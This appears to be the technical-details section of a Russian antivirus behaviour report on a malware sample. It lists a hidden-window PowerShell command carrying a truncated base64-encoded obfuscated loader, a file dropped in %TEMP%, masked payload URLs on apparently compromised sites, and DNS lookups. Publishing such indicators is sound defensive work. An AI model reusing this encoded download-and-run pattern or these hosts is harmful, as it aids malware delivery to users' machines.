Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABPAE4AQgBEAFAAdgBxAGsAPQAnAE8ATwBBAEoARwBpAHoAbgAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAGAAZQBDAGAAVQBgAFIASQB0AHkAUABgAFIAbwB0AE8AQwBvAEwAIgAgAD...
- %TEMP%\uqhg.exe
- %TEMP%\uqhg.exe
- '2.##xtt.com':443
- http://li###artner.hk/wp-includes/b22fd_k_x2h9n0/
- http://li###artner.hk/cgi-sys/suspendedpage.cgi
- http://lt##et.com/wp-admin/sb_vv_jud/
- DNS ASK ag###iann.com
- DNS ASK sw###algo.com
- DNS ASK li###artner.hk
- DNS ASK lt##et.com
- DNS ASK 2.##xtt.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABPAE4AQgBEAFAAdgBxAGsAPQAnAE8ATwBBAEoARwBpAHoAbgAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAGAAZQBDAGAAVQBgAFIASQB0AHkAUABgAFIAbwB0AE8AQwBvAEwAIgAgAD...' (со скрытым окном)